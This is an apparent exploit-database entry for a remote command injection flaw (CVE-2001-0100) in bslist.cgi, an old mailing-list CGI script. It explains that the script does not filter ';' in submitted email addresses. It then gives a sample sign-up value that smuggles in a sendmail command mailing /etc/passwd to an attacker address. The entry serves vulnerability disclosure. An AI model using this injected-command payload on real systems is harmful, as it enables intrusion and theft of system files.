Brian Stanback bslist.cgi 1.0 - Remote Command Execution

Author: rivendell_team
type: remote
platform: cgi
port: 
date_added: 2000-12-20  
date_updated: 2012-08-14  
verified: 1  
codes: CVE-2001-0100;OSVDB-7161  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20525.txt  
source: https://www.securityfocus.com/bid/2160/info

An input validation vulnerability exists in Brian Stanback's bslist.cgi, a script designed to coordinate mailing lists.

The script fails to properly filter ';' characters from the user-supplied email addresses collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.

This can be exploited by signing up for the mailing list with the email address of

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'